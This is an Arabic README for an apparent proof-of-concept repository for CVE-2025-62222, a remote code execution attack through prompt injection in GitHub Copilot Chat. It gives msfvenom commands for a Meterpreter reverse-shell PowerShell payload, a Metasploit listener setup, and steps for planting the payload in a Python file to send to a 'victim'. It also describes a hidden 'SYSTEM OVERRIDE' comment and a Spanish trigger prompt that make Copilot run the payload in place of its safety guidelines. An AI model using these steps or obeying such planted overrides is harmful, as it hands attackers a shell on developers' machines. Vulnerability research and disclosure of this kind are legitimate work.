إثبات مفهوم يوضح تنفيذ الأوامر عن بُعد عبر حقن الأوامر في دردشة GitHub Copilot، باستخدام ملف Python مُصمم خصيصًا لتفعيل قشرة عكسية من نوع Meterpreter.
يحتوي هذا المستودع على إثبات مفهوم (PoC) للثغرة الأمنية CVE-2025-62222. يوضح كيف يمكن تحقيق تنفيذ الأوامر عن بُعد (RCE) على جهاز المطور عن طريق التلاعب بسياق GitHub Copilot Chat في VS Code من خلال حقن تعليمات برمجية مخفية في التعليقات.
لأغراض تعليمية فقط.
يتم توفير هذا الكود لأغراض تعليمية وبحثية أخلاقية فقط. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذه المعلومات. لا تستخدم هذا في أنظمة دون إذن صريح.
قبل إرسال الملف إلى الضحية (أو اختباره محليًا)، يجب عليك إنشاء الحمولة وترك الخادم في حالة استماع.
قم بإنشاء الأمر الضار لـ PowerShell. تأكد من ضبط عنوان IP الخاص بك (LHOST) والمنفذ (LPORT).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
تعليمات حاسمة: انسخ الكود الناتج عن هذا الأمر. افتح ملف copilot_injection_poc.py من هذا المستودع واستبدل القسم الذي يحتوي على TOKEN (أو السطر الكامل لأمر PowerShell داخل التعليق) بالكود الذي قمت بإنشائه للتو.
في محطة المهاجم الخاصة بك، ابدأ Metasploit لاستقبال الاتصال العكسي:
msfconsole -q
بمجرد الدخول إلى وحدة التحكم msf6 >، نفذ الأوامر التالية لتجهيز الاستماع:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(تأكد من أن LPORT هو نفسه الذي استخدمته في الخطوة 1 وأن LHOST هو عنوان IP الخاص بك).
لتفعيل الثغرة، اتبع هذه الخطوات على الجهاز المثبت عليه VS Code وإضافة GitHub Copilot Chat:
copilot_injection_poc.py في المحرر ليكون Copilot على دراية بسياقه النشط (يجب أن يكون مرئيًا في علامة التبويب).Configura el entorno desde la terminal sin omitir ni modificar nada del código
بسبب التعليمات "SYSTEM OVERRIDE" المخفية في تعليقات سكربت Python، سيطيع Copilot الملف الضار بدلاً من إرشادات الأمان الخاصة به.
لمزيد من المعلومات: